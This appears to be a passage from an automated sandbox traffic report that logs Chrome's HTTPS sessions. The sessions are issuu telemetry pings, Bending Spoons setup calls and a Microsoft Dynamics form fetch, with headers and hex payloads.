                                                                                                          x-envoy-upstream-service-time: 10
                                                                                                          via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-24 19:56:36 UTC119INData Raw: 7b 22 73 65 6e 64 5f 6e 65 78 74 5f 62 61 74 63 68 5f 69 6e 74 65 72 76 61 6c 22 3a 20 32 2e 30 2c 20 22 72 75 6c 65 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 73 70 6f 6f 6e 65 72 73 22 2c 20 22 76 61 6c 75 65 22 3a 20 74 72 75 65 7d 2c 20 7b 22 6e 61 6d 65 22 3a 20 22 73 74 61 6e 64 61 72 64 22 2c 20 22 76 61 6c 75 65 22 3a 20 66 61 6c 73 65 7d 5d 7d
                                                                                                          Data Ascii: {"send_next_batch_interval": 2.0, "rules": [{"name": "spooners", "value": true}, {"name": "standard", "value": false}]}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.44979835.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:36 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 718
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:36 UTC718OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2d 70 61 67 65 6c 6f 61 64 2d 73 74 61 74 73 22 2c 22 73 75 63 63 65 73 73 5f 63 6f 75 6e 74 22 3a 31 2c 22 73 75 63 63 65 73 73 5f 74 6f 74 61 6c 5f 74 69 6d 65 22 3a 32 37 38 34 2e 36 30 30 30 30 30 30 30 30 30 30 36 2c 22 73 75 63 63 65 73 73 5f 61 66 74 65 72 5f 72
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3-pageload-stats","success_count":1,"success_total_time":2784.600000000006,"success_after_r
                                                                                                          2024-12-24 19:56:36 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:36 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.44979935.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:37 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:37 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:37 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:37 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.44980134.36.49.684435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:38 UTC437OUTGET /v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0 HTTP/1.1
                                                                                                          Host: spidersense.bendingspoons.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:38 UTC225INHTTP/1.1 200 OK
                                                                                                          date: Tue, 24 Dec 2024 19:56:03 GMT
                                                                                                          server: istio-envoy
                                                                                                          Content-Length: 119
                                                                                                          x-envoy-upstream-service-time: 5
                                                                                                          via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-24 19:56:38 UTC119INData Raw: 7b 22 73 65 6e 64 5f 6e 65 78 74 5f 62 61 74 63 68 5f 69 6e 74 65 72 76 61 6c 22 3a 20 32 2e 30 2c 20 22 72 75 6c 65 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 73 70 6f 6f 6e 65 72 73 22 2c 20 22 76 61 6c 75 65 22 3a 20 74 72 75 65 7d 2c 20 7b 22 6e 61 6d 65 22 3a 20 22 73 74 61 6e 64 61 72 64 22 2c 20 22 76 61 6c 75 65 22 3a 20 66 61 6c 73 65 7d 5d 7d
                                                                                                          Data Ascii: {"send_next_batch_interval": 2.0, "rules": [{"name": "spooners", "value": true}, {"name": "standard", "value": false}]}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.44980213.107.246.634435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:40 UTC808OUTGET /2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1
                                                                                                          Host: assets-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-User: ?1
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:41 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 24 Dec 2024 19:56:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 491
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: public, max-age=900, must-revalidate
                                                                                                          x-ms-trace-id: 8f6fb08d375b0a97ed45c87f49c639d5
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff
                                                                                                          x-azure-ref: 20241224T195641Z-156796c549bpdgsjhC1EWR7zk000000011y0000000008pxz
                                                                                                          x-fd-int-roxy-purgeid: 81460813
                                                                                                          X-Cache: TCP_MISS
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-12-24 19:56:41 UTC491INData Raw: 3c 64 69 76 0a 20 20 20 20 20 20 20 20 64 61 74 61 2d 66 6f 72 6d 2d 69 64 3d 27 61 66 64 36 38 33 61 38 2d 37 62 62 63 2d 65 66 31 31 2d 62 38 65 39 2d 30 30 30 64 33 61 34 33 63 66 32 39 27 0a 20 20 20 20 20 20 20 20 64 61 74 61 2d 66 6f 72 6d 2d 61 70 69 2d 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 63 2d 65 75 72 2e 6d 6b 74 2e 64 79 6e 61 6d 69 63 73 2e 63 6f 6d 2f 61 70 69 2f 76 31 2e 30 2f 6f 72 67 73 2f 32 65 32 30 62 64 66 34 2d 61 63 62 36 2d 65 66 31 31 2d 38 61 36 36 2d 30 30 30 64 33 61 33 61 30 39 35 31 2f 6c 61 6e 64 69 6e 67 70 61 67 65 66 6f 72 6d 73 27 0a 20 20 20 20 20 20 20 20 64 61 74 61 2d 63 61 63 68 65 64 2d 66 6f 72 6d 2d 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2d 65 75 72 2e 6d 6b 74 2e 64 79 6e 61 6d
                                                                                                          Data Ascii: <div data-form-id='afd683a8-7bbc-ef11-b8e9-000d3a43cf29' data-form-api-url='https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms' data-cached-form-url='https://assets-eur.mkt.dynam


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.44980435.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:40 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 852
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:40 UTC852OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:41 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:41 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.44980535.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:42 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 409
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:42 UTC409OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2d 66 65 61 74 75 72 65 73 2e 50 55 42 4c 49 43 41 54 49 4f 4e 5f 4c 49 4e 4b 22 2c 22 6f 70 70 6f 72 74 75 6e 69 74 79 22 3a 31 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 72 65 61 64 65 72 43 6f 6e 66 69 67 22 3a 22 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3-features.PUBLICATION_LINK","opportunity":1,"attributes":{"readerConfig":"sharable-fullscr
                                                                                                          2024-12-24 19:56:42 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:42 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.44980735.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:44 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 763
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:44 UTC763OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:45 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:45 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.44981035.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:50 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 764
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:50 UTC764OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:50 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:50 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.44981135.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:55 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:55 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:55 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:55 GMT
                                                                                                          Via: 1.1 google
